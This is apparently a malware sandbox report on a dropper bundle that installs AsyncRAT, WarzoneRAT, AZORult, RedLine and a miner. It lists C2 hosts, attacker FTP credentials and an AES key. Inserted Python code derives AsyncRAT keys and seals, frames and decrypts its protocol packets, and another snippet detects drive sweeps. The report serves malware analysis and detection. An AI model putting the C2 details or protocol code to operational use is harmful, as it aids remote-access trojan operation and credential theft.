Downloads.exe

General
Target: Downloads.exe
Filesize: 141MB
Completed: 19-11-2020 17:48
Score: 10/10
MD5: 07917bc6f34323a498bbbf68eb446724
SHA1: 6f192776575fe4087684d24a0a5fb07e5a1c76ed
SHA256: a6942a7cce17a9de2ff1679f685796468698f06a45f6e4e97b9ff5027ef35a86

Malware Config

Extracted credentials
Protocol: ftp
Host: 45.141.184.35
Port: 21
Username: alex
Password: easypassword

Extracted credentials
Protocol: ftp
Host: 109.248.203.91
Port: 21
Username: alex
Password: easypassword

Extracted config
Family: azorult
C2: http://195.245.112.115/index.php

Extracted config
Family: warzonerat
C2: sandyclark255.hopto.org:5200

Extracted config
Family: asyncrat
Version: 0.5.6A
C2:
  sandyclark255.hopto.org:6606
  sandyclark255.hopto.org:8808
  sandyclark255.hopto.org:7707
Attributes:
  aes_key: DStgwPf5qCYAcWWcPg3CaZBkDbYF3HQo
  anti_detection: true
  autorun: true
  bdos: false
  delay:
  host: sandyclark255.hopto.org
  hwid:
  install_file:
  install_folder: %AppData%
  mutex: adweqsds56332
  pastebin_config: null
  port: 6606,8808,7707
  version: 0.5.6A
  aes.plain:
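What the aes_key attribute above actually is, as an added example that is not part of this report or of the AsyncRAT project: AsyncRAT 0.5.x encrypts its hard-coded Settings strings (hosts, ports, mutex and so on) and every socket message with AES-256-CBC plus HMAC-SHA256, deriving both keys from one master string with PBKDF2-HMAC-SHA1 over a salt fixed in the client. The salt, iteration count and blob layout below are reconstructed from the publicly available 0.5.x client source; SAMPLE_AES_KEY is the page's aes_key value, assumed here to be the master string as the client sees it after base64-decoding Settings.Key. Function names are this example's own. Everything except decrypt_config_string runs on the standard library; that one function assumes the third-party cryptography package is installed for the AES step.

```python
"""AsyncRAT 0.5.x key derivation, packet authentication and framing."""
import base64
import hashlib
import hmac
import struct
from typing import Iterator, Tuple

# Fixed PBKDF2 salt hard-coded in AsyncRAT's Aes256 class (client and server).
ASYNCRAT_SALT = bytes.fromhex(
    "bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941")
ITERATIONS = 50000
KEY_LEN, AUTH_KEY_LEN, HMAC_LEN, IV_LEN = 32, 64, 32, 16

# The aes_key the sandbox reported for this sample (taken from the page above;
# assumed to be the decoded master string, not the base64 Settings.Key).
SAMPLE_AES_KEY = "DStgwPf5qCYAcWWcPg3CaZBkDbYF3HQo"


def derive_keys(master_key: str) -> Tuple[bytes, bytes]:
    """Rfc2898DeriveBytes(masterKey, Salt, 50000).GetBytes(32) followed by
    GetBytes(64): both calls read one continuous PBKDF2-HMAC-SHA1 stream, so a
    single 96-byte derivation split in two is bit-identical."""
    stream = hashlib.pbkdf2_hmac("sha1", master_key.encode("utf-8"),
                                 ASYNCRAT_SALT, ITERATIONS, KEY_LEN + AUTH_KEY_LEN)
    return stream[:KEY_LEN], stream[KEY_LEN:]


def open_packet(auth_key: bytes, blob: bytes) -> Tuple[bytes, bytes]:
    """Split [HMAC-SHA256(32)][IV(16)][AES-CBC ciphertext] and verify the MAC,
    which AsyncRAT computes over IV||ciphertext (encrypt-then-MAC)."""
    body_len = len(blob) - HMAC_LEN - IV_LEN
    if body_len < 16 or body_len % 16:
        raise ValueError("malformed AsyncRAT blob")
    mac, body = blob[:HMAC_LEN], blob[HMAC_LEN:]
    expected = hmac.new(auth_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("HMAC mismatch: wrong aes_key or tampered data")
    return body[:IV_LEN], body[IV_LEN:]


def seal_packet(auth_key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """Inverse of open_packet; lets us build test vectors without an AES library."""
    body = iv + ciphertext
    return hmac.new(auth_key, body, hashlib.sha256).digest() + body


def frame(blob: bytes) -> bytes:
    """Prefix one sealed blob with the 4-byte little-endian length the client
    writes before every message on the socket (inside its TLS session)."""
    return struct.pack("<I", len(blob)) + blob


def split_stream(data: bytes) -> Iterator[bytes]:
    """Undo frame() over a captured stream, yielding one sealed blob per message."""
    pos = 0
    while pos + 4 <= len(data):
        (n,) = struct.unpack_from("<I", data, pos)
        pos += 4
        if pos + n > len(data):
            raise ValueError("truncated frame")
        yield data[pos:pos + n]
        pos += n


def decrypt_config_string(master_key: str, b64: str) -> str:
    """Decrypt one Settings string (Hosts, Ports, MTX, ...). The AES-256-CBC
    step needs the third-party 'cryptography' package (assumed installed),
    imported lazily so the rest of this module works with the stdlib alone."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    key, auth_key = derive_keys(master_key)
    iv, ct = open_packet(auth_key, base64.b64decode(b64))
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding")
    return padded[:-pad].decode("utf-8")


if __name__ == "__main__":
    aes_key, hmac_key = derive_keys(SAMPLE_AES_KEY)
    print("AES-256 key :", aes_key.hex())
    print("HMAC key    :", hmac_key.hex())
```

Run it to print the two derived keys for this sample; feed decrypt_config_string a base64 Settings string pulled from an unpacked client to recover the hosts and ports the sandbox listed. An HMAC mismatch from open_packet means the aes_key is wrong or the blob is truncated, which is the first thing to check when a config extractor returns garbage.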
Signatures (72)

Tactics covered: Collection, Credential Access, Defense Evasion, Discovery, Execution, Impact, Persistence
  • AsyncRat

    Description

    AsyncRAT is an open-source .NET remote access trojan designed to remotely monitor and control other computers.

  • Azorult

    Description

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings

    TTPs

    Modify Registry, Modify Existing Service, Disabling Security Tools
  • Modifies visibility of hidden/system files in Explorer

    TTPs

    Hidden Files and Directories, Modify Registry
  • Pony,Fareit

    Description

    Pony (also tracked as Fareit) is a credential-stealing trojan and downloader: it harvests saved passwords from browsers, FTP and mail clients and forwards them to its control panel.

  • RMS

    Description

    Remote Manipulator System (RMS) is a legitimate remote access tool developed by the Russian company TektonIT; it is frequently abused for unattended access, and here it runs as the dropped rutserv.exe (see "Executes dropped EXE").

  • RedLine

    Description

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload

    Reported IOCs

    resource | yara_rule
    behavioral1/files/0x000300000001ac16-302.dat | family_redline
    behavioral1/files/0x000300000001ac16-304.dat | family_redline
  • WarzoneRat, AveMaria

    Description

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass

    TTPs

    Disabling Security Tools, Modify Registry
  • xmrig

    Description

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner; its presence here means the bundle drops a cryptominer alongside the RATs and stealers.
  • ACProtect 1.3x - 1.4x DLL software

    Description

    Detects files packed with ACProtect.

    Reported IOCs

    resource | yara_rule
    behavioral1/files/0x000100000001abd9-47.dat | acprotect
    behavioral1/files/0x000100000001abda-48.dat | acprotect
  • Async RAT payload

    Reported IOCs

    resource | yara_rule
    behavioral1/memory/5208-944-0x0000000006CE0000-0x0000000006CED000-memory.dmp | asyncrat
  • Grants admin privileges

    Description

    Uses net.exe to modify the user's privileges.

    TTPs

    Account Manipulation
  • Nirsoft

    Reported IOCs

    resource | yara_rule
    behavioral1/files/0x000100000001ad04-458.dat | Nirsoft
    behavioral1/files/0x000100000001ad04-457.dat | Nirsoft
    behavioral1/files/0x000500000001ac3c-475.dat | Nirsoft
    behavioral1/files/0x000500000001ac3c-474.dat | Nirsoft
    behavioral1/files/0x000200000001ad33-487.dat | Nirsoft
    behavioral1/files/0x000200000001ad33-486.dat | Nirsoft
    behavioral1/files/0x000400000001ad33-494.dat | Nirsoft
    behavioral1/files/0x000400000001ad33-495.dat | Nirsoft
  • Warzone RAT Payload

    Reported IOCs

    resource | yara_rule
    behavioral1/memory/5580-680-0x0000000000400000-0x0000000000554000-memory.dmp | warzonerat
    behavioral1/memory/5580-682-0x0000000000405CE2-mapping.dmp | warzonerat
    behavioral1/memory/5580-685-0x0000000000400000-0x0000000000554000-memory.dmp | warzonerat
  • XMRig Miner Payload

    Reported IOCs

    resource | yara_rule
    behavioral1/files/0x000100000001ac11-1868.dat | xmrig
  • ASPack v2.12-2.42

    Description

    Detects executables packed with ASPack v2.12-2.42

    Reported IOCs

    resource | yara_rule
    behavioral1/files/0x000100000001abd7-34.dat | aspack_v212_v242
    behavioral1/files/0x000100000001abd7-33.dat | aspack_v212_v242
    behavioral1/files/0x000100000001abd7-40.dat | aspack_v212_v242
    behavioral1/files/0x000100000001abd7-42.dat | aspack_v212_v242
    behavioral1/files/0x000100000001abd7-43.dat | aspack_v212_v242
  • Blocks application from running via registry modification

    Description

    Adds an application to the registry list of disallowed applications so that Windows refuses to start it.
  • Drops file in Drivers directory
    Processes: cmd.exe, OnlineInstaller.tmp, update.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\System32\drivers\etc\hosts | cmd.exe
    File created | C:\Windows\system32\drivers\iaStorE.sys | OnlineInstaller.tmp
    File opened for modification | C:\Windows\System32\drivers\etc\hosts | update.exe
  • Executes dropped EXE
    Processes (48 launches): update.exe, wini.exe, winit.exe, rutserv.exe, cheat.exe, taskhost.exe, taskhostw.exe, R8.exe, winlogon.exe, Rar.exe, utorrent.exe, azur.exe, RDPWInst.exe, api.exe, Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe, OnlineInstaller.exe, system.exe, OnlineInstaller.tmp, 42f972925508a82236e8533567487761.exe, RDPWinst.exe, intro.exe, keygen-pr.exe, keygen-step-1.exe, keygen-step-4.exe, 002.exe, key.exe, Setup.exe, setup.exe, aliens.exe, jg2_2qua.exe, 97535F5358BB4449.exe, 1605810348493.exe, hjjgaa.exe, jfiag_gg.exe, 1605810353930.exe, 1605810359509.exe, 1605810362353.exe

    Reported IOCs

    pid | process
    4028 | update.exe
    768 | wini.exe
    632 | winit.exe
    2108 | rutserv.exe
    1628 | rutserv.exe
    1276 | rutserv.exe
    2228 | rutserv.exe
    1200 | cheat.exe
    1712 | taskhost.exe
    4964 | taskhostw.exe
    4156 | R8.exe
    4244 | taskhost.exe
    4656 | winlogon.exe
    4844 | Rar.exe
    576 | utorrent.exe
    3548 | azur.exe
    4932 | update.exe
    1400 | RDPWInst.exe
    1620 | api.exe
    2304 | Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
    4404 | OnlineInstaller.exe
    4416 | system.exe
    4856 | OnlineInstaller.tmp
    4224 | 42f972925508a82236e8533567487761.exe
    4216 | RDPWinst.exe
    5136 | intro.exe
    5216 | keygen-pr.exe
    5252 | keygen-step-1.exe
    5448 | keygen-step-4.exe
    5692 | RDPWInst.exe
    5720 | 002.exe
    5728 | key.exe
    5868 | key.exe
    5948 | Setup.exe
    6140 | setup.exe
    5316 | RDPWinst.exe
    5192 | aliens.exe
    4948 | jg2_2qua.exe
    5304 | 97535F5358BB4449.exe
    5372 | 97535F5358BB4449.exe
    5724 | 1605810348493.exe
    4056 | hjjgaa.exe
    6120 | jfiag_gg.exe
    5632 | 1605810353930.exe
    6112 | jfiag_gg.exe
    5392 | 1605810359509.exe
    5928 | 1605810362353.exe
    5712 | taskhostw.exe
  • Modifies Windows Firewall

    TTPs

    Modify Existing Service
  • Sets DLL path for service in the registry

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry
  • Sets file to hidden

    Description

    Sets the hidden and/or system attribute on a file so that Explorer and default directory listings do not show it.

    TTPs

    Hidden Files and Directories
  • Stops running service(s)

    TTPs

    Modify Existing Service, Service Stop
  • Suspicious Office macro

    Description

    Office document containing Excel 4.0 (XLM) macros, a legacy macro format still executed by Excel and commonly used to evade VBA-focused scanning.

    Reported IOCs

    resource | yara_rule
    behavioral1/files/0x000100000001ac67-418.dat | office_xlm_macros
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Reported IOCs

    resource | yara_rule
    behavioral1/files/0x000100000001abd9-47.dat | upx
    behavioral1/files/0x000100000001abda-48.dat | upx
    behavioral1/files/0x000100000001ac1b-232.dat | upx
    behavioral1/files/0x000100000001ac1b-234.dat | upx
    behavioral1/files/0x000100000001ac23-253.dat | upx
    behavioral1/files/0x000100000001ac23-254.dat | upx
    behavioral1/files/0x000300000001ac13-279.dat | upx
    behavioral1/files/0x000300000001ac13-280.dat | upx
    behavioral1/files/0x000100000001ad2e-466.dat | upx
    behavioral1/files/0x000100000001ad2e-465.dat | upx
    behavioral1/files/0x000100000001ad2e-479.dat | upx
    behavioral1/files/0x000100000001ad2e-480.dat | upx
    behavioral1/memory/1976-1605-0x0000000000400000-0x0000000000472000-memory.dmp | upx
    behavioral1/memory/1976-1609-0x0000000000400000-0x0000000000472000-memory.dmp | upx
    behavioral1/memory/1976-1610-0x0000000000400000-0x0000000000472000-memory.dmp | upx
    behavioral1/files/0x000100000001ac1b-1781.dat | upx
  • Loads dropped DLL
    Processes: azur.exe, Setup.exe, svchost.exe, MsiExec.exe

    Reported IOCs

    pid | process
    3548 | azur.exe (6 loads)
    5948 | Setup.exe (3 loads)
    4492 | svchost.exe
    4424 | MsiExec.exe
  • Modifies file permissions
    Processes: icacls.exe (56 invocations)

    TTPs

    File Permissions Modification

    Reported IOCs

    pid | process
    4640 | icacls.exe
    5096 | icacls.exe
    2920 | icacls.exe
    4344 | icacls.exe
    3580 | icacls.exe
    4280 | icacls.exe
    2224 | icacls.exe
    3492 | icacls.exe
    4852 | icacls.exe
    4176 | icacls.exe
    5044 | icacls.exe
    4496 | icacls.exe
    4504 | icacls.exe
    4960 | icacls.exe
    4840 | icacls.exe
    3004 | icacls.exe
    4464 | icacls.exe
    4596 | icacls.exe
    4116 | icacls.exe
    4212 | icacls.exe
    4732 | icacls.exe
    4380 | icacls.exe
    4192 | icacls.exe
    5004 | icacls.exe
    4140 | icacls.exe
    5108 | icacls.exe
    1300 | icacls.exe
    5028 | icacls.exe
    4728 | icacls.exe
    4648 | icacls.exe
    3844 | icacls.exe
    3028 | icacls.exe
    4888 | icacls.exe
    3932 | icacls.exe
    924 | icacls.exe
    4548 | icacls.exe
    4308 | icacls.exe
    4124 | icacls.exe
    1760 | icacls.exe
    4296 | icacls.exe
    2352 | icacls.exe
    1904 | icacls.exe
    4788 | icacls.exe
    572 | icacls.exe
    4164 | icacls.exe
    4704 | icacls.exe
    4828 | icacls.exe
    4584 | icacls.exe
    1368 | icacls.exe
    1812 | icacls.exe
    4304 | icacls.exe
    4968 | icacls.exe
    4708 | icacls.exe
    4756 | icacls.exe
    4276 | icacls.exe
    4692 | icacls.exe
  • Reads data files stored by FTP clients

    Description

    Tries to access configuration files associated with programs like FileZilla.

    TTPs

    Data from Local System, Credentials in Files
  • Reads local data of messenger clients

    Description

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    TTPs

    Data from Local System, Credentials in Files
  • Reads user/profile data of local email clients

    Description

    Email clients store some user data on disk where infostealers will often target it.

    TTPs

    Data from Local System, Credentials in Files
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local System, Credentials in Files
  • Accesses cryptocurrency files/wallets, possible credential harvesting

    TTPs

    Data from Local System, Credentials in Files
  • Adds Run key to start application
    Processes: taskhostw.exe, hjjgaa.exe

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | taskhostw.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | taskhostw.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe" | hjjgaa.exe
  • Checks for any installed AV software in registry
    OnlineInstaller.exe

    TTPs

    Security Software Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira | OnlineInstaller.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    TTPs

    Query Registry
  • Checks whether UAC is enabled
    Processes: aliens.exe, jg2_2qua.exe, 97535F5358BB4449.exe (two instances)

    TTPs

    System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | aliens.exe
    Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | jg2_2qua.exe
    Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 97535F5358BB4449.exe
    Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 97535F5358BB4449.exe
  • Enumerates connected drives
    Processes: msiexec.exe, api.exe

    Description

    Attempts to read the root path of drives other than the default C: drive. Both msiexec.exe and the dropped api.exe probe nearly every letter from A: to Z:.

    TTPs

    Query Registry, Peripheral Device Discovery, System Information Discovery

    Reported IOCs

    description | ioc | process
    File opened (read-only) | \??\H: | msiexec.exe
    File opened (read-only) | \??\U: | msiexec.exe
    File opened (read-only) | \??\U: | api.exe
    File opened (read-only) | \??\B: | api.exe
    File opened (read-only) | \??\Z: | api.exe
    File opened (read-only) | \??\B: | msiexec.exe
    File opened (read-only) | \??\V: | msiexec.exe
    File opened (read-only) | \??\A: | api.exe
    File opened (read-only) | \??\S: | api.exe
    File opened (read-only) | \??\V: | msiexec.exe
    File opened (read-only) | \??\H: | msiexec.exe
    File opened (read-only) | \??\I: | api.exe
    File opened (read-only) | \??\Q: | api.exe
    File opened (read-only) | \??\J: | msiexec.exe
    File opened (read-only) | \??\O: | msiexec.exe
    File opened (read-only) | \??\J: | msiexec.exe
    File opened (read-only) | \??\S: | msiexec.exe
    File opened (read-only) | \??\K: | api.exe
    File opened (read-only) | \??\A: | msiexec.exe
    File opened (read-only) | \??\Q: | msiexec.exe
    File opened (read-only) | \??\W: | msiexec.exe
    File opened (read-only) | \??\Y: | msiexec.exe
    File opened (read-only) | \??\V: | api.exe
    File opened (read-only) | \??\P: | api.exe
    File opened (read-only) | \??\K: | msiexec.exe
    File opened (read-only) | \??\A: | msiexec.exe
    File opened (read-only) | \??\F: | msiexec.exe
    File opened (read-only) | \??\P: | msiexec.exe
    File opened (read-only) | \??\Q: | msiexec.exe
    File opened (read-only) | \??\H: | api.exe
    File opened (read-only) | \??\R: | api.exe
    File opened (read-only) | \??\w: | api.exe
    File opened (read-only) | \??\Y: | msiexec.exe
    File opened (read-only) | \??\E: | msiexec.exe
    File opened (read-only) | \??\I: | msiexec.exe
    File opened (read-only) | \??\M: | msiexec.exe
    File opened (read-only) | \??\L: | api.exe
    File opened (read-only) | \??\F: | api.exe
    File opened (read-only) | \??\E: | msiexec.exe
    File opened (read-only) | \??\P: | msiexec.exe
    File opened (read-only) | \??\N: | msiexec.exe
    File opened (read-only) | \??\D: | api.exe
    File opened (read-only) | \??\G: | msiexec.exe
    File opened (read-only) | \??\O: | msiexec.exe
    File opened (read-only) | \??\B: | msiexec.exe
    File opened (read-only) | \??\T: | api.exe
    File opened (read-only) | \??\Y: | api.exe
    File opened (read-only) | \??\M: | msiexec.exe
    File opened (read-only) | \??\N: | msiexec.exe
    File opened (read-only) | \??\S: | msiexec.exe
    File opened (read-only) | \??\U: | msiexec.exe
    File opened (read-only) | \??\G: | api.exe
    File opened (read-only) | \??\O: | api.exe
    File opened (read-only) | \??\X: | msiexec.exe
    File opened (read-only) | \??\N: | api.exe
    File opened (read-only) | \??\R: | msiexec.exe
    File opened (read-only) | \??\F: | msiexec.exe
    File opened (read-only) | \??\J: | api.exe
    File opened (read-only) | \??\Z: | msiexec.exe
    File opened (read-only) | \??\E: | api.exe
    File opened (read-only) | \??\L: | msiexec.exe
    File opened (read-only) | \??\W: | msiexec.exe
    File opened (read-only) | \??\R: | msiexec.exe
    File opened (read-only) | \??\M: | api.exe
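The rows above are one event per drive letter, which is the wrong unit for alerting; the useful signal is how many distinct letters one process touched. The following is an added example, not part of this report or of any tool it names: it folds the 64 probe rows above (copied in report order) into a per-process count, case-folding the letter because the report shows api.exe opening \??\w: in lower case alongside the upper-case letters. The threshold and the allowlist are tuning assumptions for this example, as is the benign explorer.exe control; function names are this example's own.

```python
"""Aggregate per-drive open events into one drive-sweep signal per process."""
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# Constructed from the 64 rows above, in report order: one (process, letter)
# pair per row, plus a benign control (explorer.exe touching two real volumes).
SAMPLE_PROBES: List[Tuple[str, str]] = (
    [("msiexec.exe", c) for c in "HUBVVHJOJSAQWYKAFPQYEIMEPNGOBMNSUXRFZLWR"]
    + [("api.exe", c) for c in "UBZASIQKVPHRwLFDTYGONJEM"]
    + [("explorer.exe", c) for c in "CD"]
)

# Tuning assumption for this example: processes permitted to touch every
# letter. Windows Installer is a frequent source of such sweeps on real hosts;
# review this list per estate rather than copying it.
DEFAULT_ALLOWLIST = frozenset({"msiexec.exe"})


def distinct_drives(probes: Iterable[Tuple[str, str]]) -> Dict[str, Set[str]]:
    """Distinct drive letters per process (process names lower-cased, letters
    upper-cased so 'w' and 'W' count once)."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for process, drive in probes:
        seen[process.lower()].add(drive.upper())
    return dict(seen)


def drive_sweepers(probes: Iterable[Tuple[str, str]], threshold: int = 8,
                   allowlist: frozenset = DEFAULT_ALLOWLIST) -> List[Tuple[str, int]]:
    """Processes that opened at least `threshold` distinct letters and are not
    allowlisted, with their counts, sorted by process name."""
    return sorted((process, len(drives))
                  for process, drives in distinct_drives(probes).items()
                  if len(drives) >= threshold and process not in allowlist)


if __name__ == "__main__":
    for process, count in drive_sweepers(SAMPLE_PROBES):
        print(f"{process}: {count} distinct drive letters probed")
```

With the allowlist in place only api.exe, a dropped binary, surfaces; clearing the allowlist surfaces msiexec.exe as well, which is the trade-off to make consciously rather than by accident.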
  • Legitimate hosting services abused for malware hosting/C2

    TTPs

    Web Service
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow | ioc
    15 | ip-api.com
    60 | checkip.amazonaws.com
    89 | ip-api.com
  • Modifies WinLogon
    Processes: update.exe, RDPWInst.exe, RDPWinst.exe

    Description

    update.exe hides a local account named "John" from the logon screen (SpecialAccounts\UserList\John = 0) while the RDP Wrapper installer enables concurrent terminal-server sessions; together with the rdpwrap.dll drop under Program Files this is a hidden-RDP-account backdoor.

    TTPs

    Winlogon Helper DLL, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | update.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | update.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | RDPWInst.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | RDPWinst.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | update.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | update.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | update.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | update.exe
  • Writes to the Master Boot Record (MBR)
    Processes: 97535F5358BB4449.exe (two instances), api.exe, aliens.exe

    Description

    Bootkits write to the MBR to gain persistence below the operating system. The evidence here is only a handle to \??\PhysicalDrive0 opened with write access; the same handle is used to query disk identifiers for sandbox and hardware-ID checks (97535F5358BB4449.exe also reads the SCSI enumeration keys below), so confirm an actual sector-0 write before calling this a bootkit.

    TTPs

    Bootkit

    Reported IOCs

    description | ioc | process
    File opened for modification | \??\PhysicalDrive0 | 97535F5358BB4449.exe
    File opened for modification | \??\PhysicalDrive0 | api.exe
    File opened for modification | \??\PhysicalDrive0 | aliens.exe
    File opened for modification | \??\PhysicalDrive0 | 97535F5358BB4449.exe
  • Drops file in System32 directory
    Processes: rutserv.exe, taskhost.exe, OnlineInstaller.tmp

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\SysWOW64\exe\rutserv.pdb | rutserv.exe
    File opened for modification | C:\Windows\System32\winmgmts:\localhost\ | taskhost.exe
    File created | C:\Windows\system32\spoolsr.exe | OnlineInstaller.tmp
    File created | C:\Windows\system32\MS.dat | OnlineInstaller.tmp
    File created | C:\Windows\system32\KeyHook64.dll | OnlineInstaller.tmp
    File created | C:\Windows\system32\KH.dat | OnlineInstaller.tmp
    File created | C:\Windows\system32\usp20.dll | OnlineInstaller.tmp
    File opened for modification | C:\Windows\SysWOW64\rutserv.pdb | rutserv.exe
    File opened for modification | C:\Windows\SysWOW64\symbols\exe\rutserv.pdb | rutserv.exe
    File opened for modification | C:\Windows\System32\winmgmts:\localhost\root\CIMV2 | taskhost.exe
    File created | C:\Windows\system32\UP.dat | OnlineInstaller.tmp
  • Suspicious use of NtSetInformationThreadHideFromDebugger
    aliens.exe

    Reported IOCs

    pid | process
    5192 | aliens.exe
  • Suspicious use of SetThreadContext
    Processes: key.exe, 97535F5358BB4449.exe

    Description

    Setting the thread context of another process is the final step of process hollowing (RunPE): key.exe targets a second key.exe instance, and 97535F5358BB4449.exe targets four freshly started firefox.exe processes so its payload runs under a browser's name.

    Reported IOCs

    description | pid | process | target process
    PID 5728 set thread context of 5868 | 5728 | key.exe | key.exe
    PID 5304 set thread context of 3312 | 5304 | 97535F5358BB4449.exe | firefox.exe
    PID 5304 set thread context of 5940 | 5304 | 97535F5358BB4449.exe | firefox.exe
    PID 5304 set thread context of 5424 | 5304 | 97535F5358BB4449.exe | firefox.exe
    PID 5304 set thread context of 4836 | 5304 | 97535F5358BB4449.exe | firefox.exe
  • Drops file in Program Files directory
    Processes: update.exe, RDPWInst.exe, utorrent.exe, setup.exe, RDPWinst.exe, attrib.exe

    Description

    Two distinct behaviours share this signature: update.exe opens the install directories of a long list of security products (AV discovery), while RDPWInst.exe, RDPWinst.exe and utorrent.exe write rdpwrap.dll and rdpwrap.ini under C:\Program Files\RDP Wrapper and attrib.exe then touches them.

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Program Files (x86)\Cezurity | update.exe
    File opened for modification | C:\Program Files\Common Files\McAfee | update.exe
    File opened for modification | C:\Program Files\ESET | update.exe
    File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | RDPWInst.exe
    File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | utorrent.exe
    File opened for modification | C:\Program Files\RDP Wrapper | utorrent.exe
    File created | C:\Program Files (x86)\dz7d9shn0mvi\__tmp_rar_sfx_access_check_259482859 | setup.exe
    File opened for modification | C:\Program Files\Enigma Software Group | update.exe
    File opened for modification | C:\Program Files\SpyHunter | update.exe
    File opened for modification | C:\Program Files\AVAST Software | update.exe
    File opened for modification | C:\Program Files (x86)\AVG | update.exe
    File created | C:\Program Files\Common Files\System\iediagcmd.exe | update.exe
    File opened for modification | C:\Program Files\AVG | update.exe
    File opened for modification | C:\Program Files (x86)\Kaspersky Lab | update.exe
    File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | RDPWInst.exe
    File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | RDPWinst.exe
    File opened for modification | C:\Program Files\Malwarebytes | update.exe
    File created | C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe | setup.exe
    File opened for modification | C:\Program Files\Cezurity | update.exe
    File opened for modification | C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe | setup.exe
    File opened for modification | C:\Program Files\ByteFence | update.exe
    File opened for modification | C:\Program Files (x86)\dz7d9shn0mvi | setup.exe
    File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | RDPWinst.exe
    File opened for modification | C:\Program Files\RDP Wrapper | attrib.exe
    File opened for modification | C:\Program Files (x86)\Panda Security | update.exe
    File opened for modification | C:\Program Files (x86)\360 | update.exe
    File opened for modification | C:\Program Files (x86)\SpyHunter | update.exe
    File opened for modification | C:\Program Files\COMODO | update.exe
    File opened for modification | C:\Program Files (x86)\AVAST Software | update.exe
    File opened for modification | C:\Program Files\Kaspersky Lab | update.exe
    File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | update.exe
    File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | attrib.exe
    File opened for modification | C:\Program Files (x86)\Microsoft JDX | update.exe
    File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.dll | attrib.exe
    File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | utorrent.exe
